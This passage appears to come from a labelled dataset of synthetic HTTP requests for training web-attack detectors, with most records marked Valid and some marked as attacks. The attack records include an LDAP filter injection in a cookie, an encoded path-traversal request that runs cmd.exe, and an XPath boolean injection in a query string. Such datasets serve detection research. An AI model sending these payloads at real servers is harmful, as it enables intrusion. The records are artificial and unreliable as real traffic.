Proxy-Authorization: oterIs cdpe=ll2ore
Authorization: NTLM ZWVzNmh0bjlYb2FldGhydW5oajNvaTV0ODZvaG82b2tjaXpvYW9v
Range: 51205-,399-
Referer: http://o5Hfh0in.it/PobtsaO/rsrhlns/wtahwat/reipxdwe/raid.aspx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.6 (X11; U; Open BSD i586 3.0; st-tr; rv:8.8.9) Gecko/75055756
UA-CPU: 68000
UA-Disp: 1393,830,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: 5.7 www.3ovMeadH.gif, 8.1 www.dilercjs.jpg:9
Transfer-Encoding: identity
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 717 213.77.249.79 "ztr6oRnm" 
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28473
Start - Id: 20511
class: Valid
GET /0aoiihi7es2ea3namh/sV5xZ_-95nS8gucSuCQ/LhBhpdpttou/5xP.23IDQzFkMU/imgM8vM20UqHr/mv.6ix1Faq9iFsO/ntvvNC94T/dwSrrnydqAhnyt/tIdqY/DzcimgAjpK.msf?S4p@=sTarHigdbiou&N76include2mSksbA=81252277&bEtyoohaan3=rrLtormrne&ed6fwN2djErtU=jeswi&Qvnph-3YPU0Y=8aGl4lehthso&tn0andtn=681263&oqs=ayan08lenpxish&ahNS=ftt%2Bs&lairtta=2465099&blety2rrctsm=20rt8tesE%3F1in&os1a=ayc HTTP/1.0
Host: 84.50.230.221
Connection: mAgksie
Accept: image/*;q=0.3
Accept-Charset: windows-1258;q=0.6, x-mac-greek, iso-8859-15;q=0.0, gb2312, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=4
Client-ip: 84.84.100.25
Cookie: Ailelo5aeeb=x;hzeaO5=505777;msy=rz59PHhentgjwR;swsRan1=322644;dfetVrEs9oao=trr;ea=p9eIsttaZVaa
Cookie2: $Version="13"
Date: Fri, 07 Aug 09 23:25:11 CET
ETag: W/"5NGpx4Cv7.7g6K@W2lq"
Expect: 100-continue
From: ttui@snpa.it
If-Modified-Since: Thu, 11 Oct 07 16:00:49 CET
If-Unmodified-Since: Tue, 24 Mar 09 20:07:50 GMT
If-Match: "--ngB44z_ya@HDZfBng"
If-None-Match: "hxXm-0JNoxhAUt7"
If-Range: "AKuWP9KlwYj..yhN"
Max-Forwards: 14
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic dGx0MHJzZTpybnN1
Authorization: Basic MU1VTzp0VGVscEFh
Range: 4491-065001,286085-641,-713
Referer: http://reuduec.com/olse/0etaieIe/wbpiE9/cyEt7ant.nsf
TE: gzip;q=0.2
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.1 (compatible; Konqueror/4.1; WinNT; sfsl; ddi5ai; jpof)
UA-CPU: MIPS
UA-Disp: 027,9138,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1448x0592
Via: 2.2 141.191.108.67, HTTP/5.5 78.97.184.223
Transfer-Encoding: identity
Upgrade: mip/6.3, ae5U3a/1.9, EalE/9.6, prd/9.3
Warning: 358 31.230.86.11 "lxeoteiukr" "Sun, 20 Feb 05 06:39:18 GMT"
X-Forwarded-For: 209.155.150.199
X-Serial-Number: 48113953855
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20511
Start - Id: 13128
class: Valid
GET /ub4XIb/nKXMbFBdeNBph/v0tlisE/aUyoMrM@F33/hxysbhCqIZaQd/dtil9strtohG33i/eN9C0M8AU2uJ.dll?ueee5iwahl=neULCWhD8j&-frq0KMVZr1O=619&txsrs0Tnn=513&apte=acgr3loAlahsn&eHraj29=tokCU.-&besEzeeaoooibbe=9069&ercslwjrsxOahTi=ieeraanprnDobei4e HTTP/1.0
Host: 37.206.26.133
Connection: close
Accept: video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: nnh-sba;q=0.9, H-igdeuafu;q=0.1, gid-n94
Cache-Control: no-transform
Client-ip: 165.9.69.137
Cookie: tuyDYUhcO1N=8324;eonencteie=nehey0oehirrn
Cookie2: $Version="578"
Date: Sun, 01 Jul 07 15:13:39 UTC
ETag: "EZnUQu-V3qHKvOtWYS"
Expect: 100-continue
From: rBs84eg@im6v.st
If-Modified-Since: Sat, 27 Dec 08 20:54:42 UTC
If-Unmodified-Since: Tue, 03 Feb 09 16:50:10 UTC
If-Match: "6yhC.wRMXxWcf8j-7"
If-None-Match: *
If-Range: "md1CZQvpVpFoF_aIQ"
Max-Forwards: 335
MIME-Version: 1.5
Pragma: hvs=o
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: vtSa3r fmye=oareoE
Range: 3154-34,666990-,28905-7
Referer: /lnueo/eEnrnIaX/aiclN.ace
TE: chunked,trailers
Trailer: Warning
User-Agent: tttlU/7.5
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9714x547
Via: HTTP/3.6 83.100.196.193:2, 7.9 www.xiwts.tiff, HTTP/9.1 www.9rTdsscb.js
Transfer-Encoding: deflate
Upgrade: OaV8e/8.3, zndhh/8.1, ikcan/5.6, i2rii/5.8, 4ue/8.0
Warning: 988 www.pasceto.js "hpmirfwelzcei" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 6109336510742510
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13128
Start - Id: 37296
class: LdapInjection
POST /er4wa2Dlha6h/eEO@WYnbO7/apT/ejeCVChjN95Ez/BC/HMPmochaKstyleemkGloglx.bin? HTTP/1.0
Content-Length: 39
Content-Language: ltvFh6no
Content-Encoding: gzip
Content-Location: /GdSn.sh
Content-MD5: bmNPc05oYWRpRnlydW91dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Oct 09 11:24:22 UTC
Last-Modified: Tue, 10 Jun 08 08:11:27 CET
Host: www.ovtnah.org:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-8-i, cp-932;q=0.4, cp-936, x-mac-arabic
Accept-Encoding: identity, gzip, compress, gzip;q=0.8
Accept-Language: *;q=0.8
Cache-Control: ai1yo='ro'
Client-ip: 11.211.54.76
Cookie: lutnqxlnoh=pY7P3;Qnph-bp4window.open1=0araeaeb0;Ktwp-nMO=")(targetfilter=(o=NetscapeRoot));1oubcm9savbt=6;lxIhoknsreylN=ea;l28cumuumammM=oSgXHV7WLTsI
Date: Tue, 23 May 06 07:38:51 GMT
ETag: W/"YZwLgk8rb4Cj_jsdXj"
Expect: 100-continue
If-Modified-Since: Fri, 29 Sep 06 24:24:04 CET
If-Unmodified-Since: Sat, 28 Aug 04 09:37:32 GMT
If-Match: *
If-None-Match: "3x9xxz.gbcmXNwsUbOXd"
If-Range: "rzw14XA-wENZ.EhXG"
Max-Forwards: 5563
Pragma: no-cache
Proxy-Authorization: llOn lpAe=ytlpnsrt
Referer: http://www.iMpFos.de/erhct1ue/osrnpye/S1is/diFefu/oetttd.aspx
User-Agent: crntfnnO (hsaLyURk8G; lmwXPDRW; tRXDkdLFmr; 5qCy39)
Via: Sec/3.9 www.NsxnMr8.jpg, 5.1 www.1ufmnei.js:13782
Transfer-Encoding: identity
Upgrade: oit/5.4, tispAm/9.3, t58osa/2.1, tie7/1.1, fguao/1.1
Warning: 435 www.2tqnqd.gif "aovnem" 
X-Forwarded-For: 158.169.133.144
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cr0tpEgnse=6&GstyleK_QHvar=9&hgdSgm=521

End - Id: 37296
Start - Id: 28555
class: Valid
GET /aeo0hlbOtnNht/bbVHruXPAxWqp/cmdbbFwf5QNEl5/5.-.6CNkform0/rgieE/iJl/iso/4UmQMN0DDzMEE4/dUST_/rihoJ.gif?upl6unnvsyhx=125928&inhaeoeSemaaut=nxr+ HTTP/1.0
Host: www.hfynplqymg.ch
Connection: keep-alive
Accept: application/x-tar, application/x-tar, application/*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ero-et, sMgxelye-h4, r7ra-fud0n, E6eIren-nda;q=0.4, e-esm8th;q=0.3
Cache-Control: yisrD=lana
Client-ip: 169.159.110.108
Cookie: etn=seu8mia
Cookie2: $Version="654"
Date: Mon, 13 Aug 07 20:29:11 UTC
ETag: W/"x-mm4uO-tB30c4h7"
Expect: toeine=ti2hhta
From: ekkeeGea@9uAbioy.it
If-Modified-Since: Wed, 19 Sep 07 09:01:57 GMT
If-Unmodified-Since: Sat, 27 Nov 04 19:53:18 CET
If-Match: ".RfFH7WaAB2E0zLaR"
If-None-Match: *
If-Range: Fri, 09 Jan 04 08:11:18 GMT
Max-Forwards: 2589
MIME-Version: 8.0
Pragma: yekct='ag'
Proxy-Authorization: Basic c3RyZ3R5bnM6bmEyag==
Authorization: Digest cnonce="5Sesq"
Range: -485791
Referer: /SlUnTrc/Gzr6t/2sirf/er3o.bin
TE: chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: peeta/5.5.1.1
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6545x8948
Via: FTP/3.2 56.167.210.205, RstLzt/8.1 115.141.233.221:29, 6.3 www.aoieD9l.htm
Transfer-Encoding: identity
Upgrade: lpo3mi/8.1, yla/6.6, eiam4/2.9
Warning: 943 www.0eTkm.jpeg "vada" "Wed, 23 Jun 04 24:08:28 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28555
Start - Id: 13114
class: Valid
GET /sG8/aNBEaw/oe.jpeg?saxdeig=vebl%29z80asspg&qshIopraTq=s%404jAE2Xa&ts9o=xH_-Ko&deUhuea9mrsoegG=eOio18&vWiTZ=fl6ee+o&9d9echov=264905&e1U=r%25UH&IZgMu4Uug=neoaR4Hloe76tcdln HTTP/1.1
Host: www.Jbhtri.cz
Connection: itj0s
Accept: application/*;q=0.4
Accept-Charset: x-mac-arabic, x-mac-korean
Accept-Encoding: deflate, compress;q=0.3, identity, deflate;q=0.4, identity
Accept-Language: lgalr-t5Ae;q=0.4, che-TcEmadmr;q=0.7
Cache-Control: ro1weduo=omeIx
Client-ip: 40.9.224.134
Cookie: aei3mre3=nT8maktrO4thnat2hi;nfuedt=eEssrFh95S;eehhio=eye m
Cookie2: $Version="52"
Date: Tue, 13 Jan 04 16:04:26 CET
ETag: W/"jDg@fUIIz3m0XqH"
Expect: 100-continue
From: uth2onre@imezhnI.biz
If-Modified-Since: Fri, 30 Apr 04 09:25:48 GMT
If-Unmodified-Since: Sun, 14 Dec 08 23:55:40 CET
If-Match: "KlX2Phwve5269h@XQ..N"
If-None-Match: *
If-Range: *
Max-Forwards: 6827
MIME-Version: 1.1
Pragma: e=od
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: NTLM MWlqdGVzZUZtbGVjcmp5UnN3bzN4YWxib25kaXpzbjJheXl0MWh2eXNlZWQ=
Range: -7936
Referer: /sgrtfUEn/ol2ztLSb/wCtnx8/Ienpnswa.jsp
TE: chunked,trailers
Trailer: Cache-Control
User-Agent: vGpEdpH/2.6.9.1.3
UA-CPU: Sparc
UA-Disp: 436,469,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 824x5832
Via: soet/3.6 130.238.96.214, eNdaH/9.1 31.158.216.232
Transfer-Encoding: deflate
Upgrade: EnnnnR/2.7
Warning: 520 www.hj995n.css:91912 "EeavrrdwAsm50ii" "Wed, 11 Jan 06 13:24:08 UTC"
X-Forwarded-For: 162.243.167.100
X-Serial-Number: 74451528959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13114
Start - Id: 36471
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.tienqdi.uk:964
Connection: keep-alive
Accept: video/*;q=0.1, image/jpeg;q=0.6, image/png
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate
Accept-Language: i-usLSonoa;q=0.2
Cache-Control: no-store
Client-ip: 171.165.21.220
Cookie: oetbh=jh3u
Cookie2: $Version="987"
Date: Sun, 31 Dec 06 12:35:45 GMT
ETag: "eHNFlmWlO@M8y5SACU7"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Mon, 04 Jul 05 22:45:41 GMT
If-Unmodified-Since: Sat, 03 Jun 06 24:36:41 GMT
If-Match: "8OnkzvC1RzRx8rNmi"
If-None-Match: "ftxI4pouqoptlt6q"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM d3NlZGVTZWJ0bG1oNzNuZGNjb2VpZDBhc2E2ZXJmMWI4b2NkZGFt
Range: 57-,410056-,436232-1281
Referer: http://www.uwnsko0o.st/cierSd/sefr/taNer/ddhlete/goal.mdb
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 9.8; ot-ti; rv:4.0.7) Gecko/46866623
UA-CPU: Sparc
UA-Disp: 8174,3331,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: HTTP/7.5 250.189.133.153
Transfer-Encoding: essd
Upgrade: fet/9.1, iro/2.9
Warning: 407 57.211.128.3 "iUaiaecen" "Mon, 03 Nov 08 07:27:24 UTC"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36471
Start - Id: 35584
class: XPathInjection
GET /no3-QZXpqrA_ahxDHANn/psioptryylash2/NnAbghseEdlndh5Tdw/40EF/rQTmochaidY/ejt8tqyenlda5eeo/O2W1_K/heTastdinFSVpXexec/zdtoarviacsEtl.php4?SxT@=z+&afooNeeEeLCwnoh=aes%27++or+++%28i++%3C+count%283izHms%2Fchild%3A%3Atext%28%29%29++++and+j+++++%3C++++count%28o4o%2Fchild%3A%3Acomment%28%29%29+++and++++k+++%3C++++count%28sdk%2Fchild%3A%3A*%29+++%29++++or+++%27rhcof%27++%3D%27+++ecHd%27++++or&st0trzt=7f8ybbYcel&1u6d8SioewE=aear7&jythiisni=9 HTTP/1.0
Host: www.eatr.gov
Connection: fOsxzri
Accept: application/*
Accept-Charset: x-mac-turkish;q=0.5
Accept-Encoding: deflate;q=0.5, identity;q=0.9
Accept-Language: rtnea-en
Cache-Control: no-transform
Client-ip: 146.199.243.126
Cookie: nbntadeaul8=n4eIN2TeEoimnhMlni;DwfFfY@Jw=922724;aescailtiakkloo=eahLajBH;aNohore=778182;a4c7brs=dei
Cookie2: $Version="8"
Date: Sun, 25 Jan 09 22:55:39 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
From: keef8S@qicoiNe.be
If-Modified-Since: Tue, 22 Nov 05 17:52:05 CET
If-Unmodified-Since: Thu, 02 Feb 06 05:06:50 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Fri, 28 Mar 08 20:25:53 GMT
Max-Forwards: 64
MIME-Version: 4.7
Pragma: no-cache
Authorization: Basic bnNmc2k6MnAzYWM=
Range: 1278-6
Referer: /rhese.jsp
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 7.7; so-or; rv:2.1.6) Gecko/95702557
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 468x391
Via: HTTP/2.1 www.ndeot.png, 6.2 www.momfs2ti.shtml, FTP/4.7 218.225.175.124
Transfer-Encoding: Evle
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 764 www.estd.html "reyeebllnhmEobh" 
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 4311526841
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35584
Start - Id: 12393
class: Valid
GET /ntseezhLrenldEtmmlh/hrKq38bVLbfotQP/h-Uxf58OhhJw/hiB2Gc6uQpassthru6PR/rdl8Zlit0BdU3tme2J2T/neIarhiDWiP/mTOxp_PkZ/ge6mcoil9ttzr/iniIma/hgaeunhcttrakhde6/tfnHsDIpAOmK/upFUIfx4GdHm.css? HTTP/1.0
Host: www.sapls.cz:46761
Connection: Gedot
Accept: */*
Accept-Charset: windows-1257, iso-2022-jp;q=0.7, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: a-1ea, 6htx-H;q=0.1
Cache-Control: no-transform
Client-ip: 149.144.194.229
Cookie: tet8r=iTdwaoaTlm;ron= ic0d;c_B.U@allwp-lb=aJaLfI8P0Orl;i1SiN9giu=gcBPej8o;asswi=797267;o02k1hraaPted=Snl
Cookie2: $Version="00"
Date: Fri, 27 Aug 04 13:21:31 CET
ETag: "IngueJ6JxcRPXvyQH"
Expect: nRes=wieneyt;tnwsGi=ogaiskdo
From: e4eiiuh@Mdhi8o.com
If-Modified-Since: Mon, 01 Mar 04 08:19:11 CET
If-Unmodified-Since: Fri, 05 Nov 04 11:12:36 CET
If-Match: *
If-None-Match: "MzAEeBt.Tbp7i_5p"
If-Range: Sat, 03 May 08 14:42:50 UTC
Max-Forwards: 1453
MIME-Version: 1.2
Pragma: nlkRcl='syn'
Proxy-Authorization: Digest opaque="oiaj"
Authorization: Digest realm
Range: 430108-5273,-207,-93
Referer: /0nJiRsAt/n1eFq/Pa8arNz/serdi5t.cfm
TE: trailers,trailers
Trailer: Warning
User-Agent: iohimei (grGw5E; mlpC0P)
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8258x863
Via: FTP/9.5 134.224.14.94, HTTP/6.0 www.e3ih3n.shtml
Transfer-Encoding: gzip
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 980 195.66.4.168 "z6cprn9ig" "Tue, 29 Aug 06 04:32:36 CET"
X-Forwarded-For: 106.171.134.114
X-Serial-Number: 41667021783349598958
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12393
Start - Id: 27284
class: Valid
GET /a3iBGSc7R3Ga/aazecee9nxNa/omc6iLrd2il6RtYih/94etyoi/7WbTJ2VN-FNmeh/awa5ItdNpnNwspo/lzuG/Gainmrsd/oesGa/6HZUQlgO/Cliframe.js?Hwhere@-Uchild-yallAOk=arnpositioneton7&8cbrns=ameta&yNgm=ehdSxterm&R7Epfvj_o=134667&Z5varshutdownOp=elalG8tldea&uIto7D4=t&whereJM_jvbscriptl4JLG3=xi2I.CxV4o4.&Umhjqy=z+%27&OSditqmout=cpoa7euGaeeio6&7rEutminn=9%3C&rm7=324645551&v1f9includeRnetcatLfvbscriptc=thdaysensedsytrl HTTP/1.0
Host: www.osrf.net
Connection: close
Accept: audio/*, audio/*, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 178.54.145.217
Cookie: rnsi0zedsyMe=71;ahb=lQf1V;0processing-instruction4HuU=ahXsrOwnc;sAsjorhli=hainuo;eMtt1nbajsl4zho=I
Cookie2: $Version="874"
Date: Sun, 16 Mar 08 15:51:40 CET
ETag: W/"dZdeLIIail_Zlt0UZ"
Expect: 100-continue
From: Dt21hm@sbe22sjbhs.com
If-Modified-Since: Sun, 27 Sep 09 02:42:37 UTC
If-Unmodified-Since: Tue, 13 Apr 04 09:37:05 UTC
If-Match: "zTFnmktBHDHL8NGAte0-"
If-None-Match: *
If-Range: "BQVQ9RC8_vK1rw1oIKh"
Max-Forwards: 6890
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM dG1ucmlod2lyY3R0dHlvaGtldG5oc2xzdWRoN1h4bmV5Tm9laGVpZGdk
Authorization: Digest username="4arjfzEs"
Range: 392-,66898-,-0761
Referer: http://www.necp.biz/ea7igkr/peegnr/0Shf.doc
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.9 (Machintosh; U; Mac OS X 4.5; no-in; rv:7.0.4) Gecko/87989295
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6912x6352
Via: 9.5 57.13.234.143, 2.4 www.iat2o.gif:9435, HTTP/9.4 www.liea.jpg
Transfer-Encoding: deflate
Upgrade: r3yltn/4.8
Warning: 238 180.27.15.55 "t7r8dlbisjtoofgu" "Tue, 07 Feb 06 13:03:45 CET"
X-Forwarded-For: 243.253.89.231
X-Serial-Number: 75164077038098175
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27284
Start - Id: 10793
class: Valid
GET /7@RV4hmochaM.tiff?5otaeSridesue=lo8aa5%277sdnldo HTTP/1.0
Host: www.to4uB7e.be:80
Connection: tozteEM
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=83
Client-ip: 210.7.8.147
Cookie: aaqei=654423;or=mLwcsG;si7l2srarh=87858037;ehOslhtan=win9
Cookie2: $Version="9"
Date: Sun, 25 Sep 05 13:43:31 GMT
ETag: "fdvwQGkTL6RVPbVmfVkN"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Tue, 23 May 06 16:41:22 CET
If-Unmodified-Since: Thu, 28 Jan 10 10:17:41 UTC
If-Match: *
If-None-Match: ".3eLlFo2BvDD3zJRc"
If-Range: "5pX0riV0i.EErHO_pwkX"
Max-Forwards: 6222
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM YTdqamR6cmFueXkwY29nYWpuN2ViaTVob3JybmRnYWFh
Authorization: kyOrs1 aryrnawo=eEtirrip
Range: 9796-,-734449,-593032
Referer: /PfImoo/8Eiaeson.gif
TE: trailers
Trailer: Warning
User-Agent: eW.0gh http://www.eparl.st
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5414x362
Via: N2srSi/9.3 www.Cne7r.js, 1.6 98.93.119.225, FTP/5.7 www.twnfros.css
Transfer-Encoding: deflate
Upgrade: dec/3.8
Warning: 774 www.dijag.css "sedtyunrietbnTe" "Sun, 26 Feb 06 01:26:33 CET"
X-Forwarded-For: 228.129.199.161
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10793
Start - Id: 5240
class: Valid
PUT /hBBD-tvx2Jxr3g57nB/zaqxcwPhGvBmDLUg/a-VSlYz0MTDy6JruFe7J/mHtdopenNc/ETR/Es/Ewox8amereneoe/biHS4dcges/jeyrqeocbfndrnCx.pl? HTTP/1.0
Content-Length: 69
Content-Language: 3h
Content-Encoding: deflate
Content-Location: /rnea/7tdaxc.doc
Content-MD5: cGV0MnU4M3BzQmFuZUtybg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Oct 07 01:06:51 GMT
Last-Modified: Mon, 16 Oct 06 20:28:54 CET
Host: www.nriEbS.it
Connection: dhori
Accept: audio/*, image/png;q=0.6, text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t-r9ost6;q=0.3, aotsspdi-qHraEe0d, q-5sorm, ierupl-lweein;q=0.1
Cache-Control: no-transform
Client-ip: 78.163.7.145
Cookie: niie86eiogs=8;zk@@zLYa=3856829;tatL=076061214;EwCvbscript7fd0a=1wbheeoHmghoth;gWeon=711
Cookie2: $Version="1"
Date: Mon, 06 Nov 06 08:46:36 UTC
ETag: "y3NKcKvbtPlTr-fH"
Expect: oi8gdf
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Mon, 19 Jul 04 16:39:38 CET
If-Unmodified-Since: Tue, 08 Sep 09 19:50:23 CET
If-Match: "7FBozxLQhed84Bl4fH26"
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:43:30 CET
Max-Forwards: 5974
MIME-Version: 9.1
Pragma: gaa=tUeedind
Proxy-Authorization: hhad rueehhom=useiI
Authorization: Basic aHRpZTo3NGJweW50
Range: 627-96060,029458-
Referer: /nzjnseaf/ssR9o0l.cfm
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 2.1; lh-fh; rv:2.1.2) Gecko/84433943
UA-CPU: PowerPC
UA-Disp: 316,8199,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4414x768
Via: 5.9 130.17.130.3:77, 5.5 www.epkAe0tt.jpeg
Transfer-Encoding: compress
Upgrade: dnid/6.6, cGoH/6.5, no1o/5.3, ni9ihh/8.4
Warning: 362 www.tsihSe9.js "t0omneapbr2e9lmgou4g" "Fri, 03 Mar 06 12:16:45 UTC"
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ys8iap=nbeu&.wgetaT46=ss8yswcbnYhpl&nsgeE=10189276&set29rkiebsc2=hoMh

End - Id: 5240
Start - Id: 13119
class: Valid
GET /aB3@ukx5IpU4D/aOMiqo.aspx?abns9=doenuihfbgsoundIo&nmaeoHe=i90ieservicesrmt%5D%3Fnn%26&dne4ei7ml6Nt=8terlyuGstisaLM&tupe88o5e2aee=lPiM7NqO0Zxf&nym7nSsimneoi=hnr4EnxlheSpn&W3Nt=5208960532&dhnwlsoDO=os&wToEe0ms=31134&tognrnoehnlte=e&ry=rglFeioeTrssp&bnuqnereil=rO%3EM8na1%5Ci HTTP/1.0
Host: 122.152.136.183
Connection: d1ove
Accept: text/*, audio/basic, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 237.28.248.153
Cookie: aei4antefvcno=daxsystemnrsallmaFebi
Cookie2: $Version="52"
Date: Fri, 04 Mar 05 01:31:51 GMT
ETag: W/"jY5@uUZjc2@-vgqZFA-T"
Expect: 100-continue
From: uth2onre@imezhnI.biz
If-Modified-Since: Tue, 21 Dec 04 22:00:24 GMT
If-Unmodified-Since: Thu, 01 Jan 09 23:14:58 UTC
If-Match: "KlX2Phwve5269h@XQ..N"
If-None-Match: "0u4o3rssveQEjmnR"
If-Range: "JgCZtdHI0i_rnei"
Max-Forwards: 035
MIME-Version: 1.1
Pragma: jadaa='t2zSuda'
Proxy-Authorization: NTLM dWdyb2xkYWZuaW5oaGNzdGNueHlpMnRUbGI2ZWJlanRlMW80YW9iaXJvYWN0ZGVl
Authorization: Basic NW5lZHNvdzpoc2lU
Range: 764-
Referer: http://Ewplo.de/ac2p5/rsyetro/itjbt.nsf
TE: chunked;q=0.1,trailers,trailers
Trailer: Cache-Control
User-Agent: ouhehzgazAyrw4Khfo
UA-CPU: Sparc
UA-Disp: 107,146,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9714x547
Via: 9.1 www.inlo.htm, 6.1 www.hdoeep.html:56
Transfer-Encoding: gzip
Upgrade: EnnnnR/2.7
Warning: 520 www.hj995n.css:91912 "EeavrrdwAsm50ii" "Wed, 11 Jan 06 13:24:08 UTC"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74451528959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13119
Start - Id: 28638
class: Valid
GET /g1uS/asreseyienrplzr/l6DZ8-/ers3hsRyclb/o7QuhWsp7AfdSRL/eoctBe2.z7GgFVRl/61ne/nehn/dZoUb.LWPguJU9/KHbody/dQ1pDCRC.jpeg?taunfe8rnseyfw=dAfc&ebrsNihE=ceX3eda+nh&artireaoso=vdnE&liqtrunUr=zar%5Dk&80W8_=haizErDpiSnaree&inpj6a4cfda=HdOntopbcf&vqWHLIHZOm=1615893&yessuminilaet=Ieifihdtwli5wt&ognfsiorr=90776&Ios7h=mGp7l&suonp2cuSIy9or=qtdsi%2Bcm4ereecHoor&nseOaefoot=h&urabdtde=tscmbstiHaAbe&0yermdtkMcAu=sC84&eaunf5e=75545990 HTTP/1.1
Host: www.sexecSC.com
Connection: lHemi1Q
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: compress;q=0.9, gzip
Accept-Language: is29sLui-esaieM9j, Eyps-hDNdiee;q=0.2, hdhihDna-hmolah;q=0.3
Cache-Control: min-fresh=39818
Client-ip: 244.119.213.222
Cookie: lol4tds=96787;Crst=4131;Omce=alAa;1Mphrsd=1b_tqU9J;th=newze
Cookie2: $Version="335"
Date: Fri, 02 Mar 07 17:38:50 CET
ETag: "p4ZowzqOkri_rJ-VG0"
Expect: uApvrb
From: 6EaEszit@irni.st
If-Modified-Since: Sat, 10 Jun 06 15:42:59 GMT
If-Unmodified-Since: Mon, 22 Mar 10 07:49:49 GMT
If-Match: *
If-None-Match: "XC_EJ73I8t7K3C3"
If-Range: *
Max-Forwards: 754
MIME-Version: 0.5
Pragma: hz4tid=9nst
